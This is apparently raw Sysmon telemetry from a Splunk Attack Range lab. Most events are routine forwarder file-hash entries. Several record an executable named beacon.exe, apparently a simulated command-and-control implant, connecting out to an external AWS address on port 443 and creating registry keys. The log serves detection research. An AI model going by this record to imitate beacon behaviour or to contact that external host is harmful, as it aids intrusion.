Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54553-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x800000000000000057345832Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:21.298{8B6011A9-E46E-6165-1E2A-00000000F101}4584C:\Users\Administrator\Desktop\beacon.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local54552-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 23542300x800000000000000021219705Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:50.079{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A2B89A0E77195ABA717F8E3F93B8473,SHA256=164FA25A0C268B2E946A56E34740A2A93FC242529ED2120CB7163E759E4E4F8C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219704Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:50.079{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAB76BF43ED4071058345185CA7A4482,SHA256=7159FFD850E9A4016918D6BBEFE5A34CEE9DEA9C3F4D8CDB6FE9CD47DBC61D68,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345837Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:51.927{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345836Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:51.927{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B58F577E8DDC044AC3ABEB5D3C677E8,SHA256=7A2367E83DBEFD5C274842D69CC1E2E43A95779ED68D70AC2E8E49E5F2CB1BE5falsetrue 23542300x800000000000000021219708Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:51.485{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B24492B92FC48EC62B5A7E804E9939E,SHA256=37DF4A76F1A8BAEF32C71D585F6608B3C208E8C8876D276A1A01D6984190141B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345839Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:52.928{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345838Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:52.928{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC5DF6FA69B45957DC523DD166990E79,SHA256=3FCE1C8D1639F1EDEDC27EDBCCC83DF4E13847A8C64875241ECF76C73737CF9Afalsetrue 23542300x800000000000000021219709Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:52.500{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=140687E24E0BA8B73D3323E0FF6F5129,SHA256=4313FF3ACFE3D9344B8E067DF00ECECBEFE613D13413170F4B3D4A38ED678D27,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345841Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:53.929{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345840Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:53.929{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17D26F73CD423777A7BFD03813DAE94D,SHA256=D82A97DEFC295FFC1B47CB6952F2244918C0BAAC36D18311468D1FBD17724922falsetrue 23542300x800000000000000021219710Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:53.500{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E1622A51CCE88B5F137130B01F4EC88,SHA256=97C1AB51BF94BE2C36BC6FE61A87C0B813CA7474B861EC75904DC46BEA7A2B8E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345843Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:54.944{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345842Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:54.944{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=925F8C663526E9C45492C9917B97860E,SHA256=8069FA06A28212F4D302CC144A87347F7D21EA793B1C8A95A6A1F5F8282ACA3Afalsetrue 23542300x800000000000000021219711Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:54.532{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB7BF778DBC7800A377A951E839790E2,SHA256=FCB915FF8251532286AB0F2E859E2B047167064F0FF17A50796D4BA0D1D16A04,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345845Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:55.959{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345844Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:55.959{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11D9AEEBA56C4F2ABF7534CB2955455C,SHA256=9BFB19A46E2297F3E1FD1B61801178044B34F42ACA43EAC30B6ECEDE94C6033Bfalsetrue 23542300x800000000000000021219712Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:55.532{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50E85A03B6F30A7F96D0F1A4D4E44945,SHA256=40F73918A0CAB63672D649E709CB2A63DAD2A949A4572D01C0A526509A6DA604,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345852Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:56.960{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345851Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:56.960{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BD2CFAF217890E0A0F3997668521428,SHA256=0248C6C45E173510E31F245219DC5DC786A8DEDE8413185045E13235A8F0277Afalsetrue 354300x800000000000000021219716Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:43.532{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64331-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219715Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:56.532{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B437E107B323A3840551825FB6AB050,SHA256=C1703E72EFFE27726B69DB15E4C495BD41E12CC8535C2F6D2902EC7EDD6C2E3F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345850Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:27.465{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54554-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057345849Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:56.128{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345848Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:56.128{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A1692710BBB88BA04C27F2333F2F630A,SHA256=D0DF7AB8950083966AE7291D7D7757D15C7F4B21EF2182FCC346BF5CB9EB1E16falsetrue 11241100x800000000000000057345847Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:56.128{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345846Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:56.128{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BB45AD670FA1838F9DF7825CCAFAAD23,SHA256=D3AA4576019765C37F016CABA10E8FB11CD6CD6C733C83D900F8609185864729falsetrue 23542300x800000000000000021219714Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:56.157{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=603EAC62BAADE2C1451F772446763C90,SHA256=6A36142B3ACECEAA67129D0A335655C40BC72AA48DA131054AC00311B330F872,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219713Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:56.157{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A2B89A0E77195ABA717F8E3F93B8473,SHA256=164FA25A0C268B2E946A56E34740A2A93FC242529ED2120CB7163E759E4E4F8C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345854Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:57.994{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345853Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:57.994{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A378CF63BA645E3DC691D679EE617216,SHA256=3A1FB6CC64F50829F2ED186C525FCC1E9F095C09561B88046E4A5BCC124170A9falsetrue 23542300x800000000000000021219717Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:57.532{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D79D0A2B73BC4DA4FB43B3D716C9F73,SHA256=291E38221782922D0A9F7147D4808FFF5C8D315140A70099E2EA86EADCA37E9D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219718Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:58.579{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF079564261B11E3766DCE36477A8401,SHA256=5E9FC3E1BEA97CE9695C3DAF64E4E88B6FEFCCA6B7565A0AE0ECE7866FF69FC2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219719Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:59.610{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1ABDF94F76C685A0AA280A8824A578CC,SHA256=D3B8A8ED7E2389AAB7D9AEA50EAB3307D3DD67C5FAB12717B7F8A1D71EB6F0FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345856Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:59.011{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345855Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:59.011{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE9A29E01341659087311D4BA7B23338,SHA256=626AB28C49F96AFCF8B60A9FE5A58CDB9F6EE7D7CD1439BB6DFCDA09D7CD737Dfalsetrue 23542300x800000000000000021219720Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:00.625{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E2F670873905B24A456E979AE1DB9B8,SHA256=0A6547D6213CB469CB7C12EF59036AAFDAAA95038434EE7ACC68016951339829,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345858Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:00.027{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345857Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:00.027{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF5384E93D958E6261345C72C04E14B2,SHA256=21B28E99A8DDD4E52879F5E3CD724389DDA5C3E66BF7606C8CA211BB9A4776B1falsetrue 354300x800000000000000021219724Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:48.594{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64332-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219723Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:01.657{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74DFB95D7C31D7497B104FAEDBCCF235,SHA256=D16394A657AD288E44890E61C622371C5C90E7457E190E2CE826ECB6AD0E5A00,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345864Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:01.228{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345863Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:01.228{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA86D5F71CB4B87C4C9DA6E354632F7D,SHA256=E1275CB85D55D2988C895A593445BE2D333B8D69EAD83AC841D58660DC6770B8falsetrue 11241100x800000000000000057345862Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:01.228{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345861Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:01.228{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A1692710BBB88BA04C27F2333F2F630A,SHA256=D0DF7AB8950083966AE7291D7D7757D15C7F4B21EF2182FCC346BF5CB9EB1E16falsetrue 11241100x800000000000000057345860Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:01.028{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345859Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:01.028{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8CD0A7D7967152C1151C0D99C8F1872,SHA256=693ABBB82FDEF07EC38E436CD7C5BA931DB3E72F13FF5D010FF4C6BB797D13CEfalsetrue 23542300x800000000000000021219722Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:01.204{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2B0213E9144B3D9E778446D62D3233B4,SHA256=7DEBAA8F0D3B4CD046B319639121D8B60C77AB4EEBFD80109A2758D25189AF7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219721Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:01.204{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=603EAC62BAADE2C1451F772446763C90,SHA256=6A36142B3ACECEAA67129D0A335655C40BC72AA48DA131054AC00311B330F872,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219725Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:02.657{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2A761A6A4A061CEAA26247ABA78F8BB,SHA256=DBB9E218FB8BBF2EA6F0A771B0C321A03BD9A4D9074FA96DBF277460A42E950E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 12241200x800000000000000057345870Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:02.575{8B6011A9-88DD-6164-B500-00000000F101}5592C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057345869Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:02.575{8B6011A9-88DD-6164-B500-00000000F101}5592C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 18141800x800000000000000057345868Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:02.343{8B6011A9-887D-6164-2D00-00000000F101}3020\lsassC:\Windows\system32\dns.exe 11241100x800000000000000057345867Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:02.028{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345866Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:02.028{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C30FC9073374F16201D4A517FABB5DC,SHA256=BDDF40101C2C960108D4553E0E5B4DF56E5904FAE37ACA2945AA0E0DE04C5C78falsetrue 354300x800000000000000057345865Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:32.566{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54555-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219726Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:03.672{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A607AFFAFD73955767F6FCB84E8EF82,SHA256=31BDFDEA5942B86D442734DF80F6396BFC7CB6A78F7D2E0955D0E144CF0B847C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345874Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:03.575{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345873Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:03.575{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program 